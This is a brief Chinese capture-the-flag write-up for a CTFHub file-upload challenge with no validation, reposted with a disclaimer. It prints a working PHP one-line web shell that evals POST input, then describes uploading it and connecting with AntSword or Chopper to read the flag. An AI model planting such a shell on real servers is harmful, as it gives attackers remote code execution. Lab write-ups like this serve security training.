ctfhub技能樹—文件上傳—無驗證


打開靶機

查看頁面信息

編寫一句話木馬

<?php 
echo "123";
@eval(@$_POST['a']);
?>

上傳木馬

上傳成功,並拿到相對路徑地址

查看頁面信息

使用蟻劍或菜刀連接

查看目錄信息

查看flag_368114112.php文件信息

成功拿到flag


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM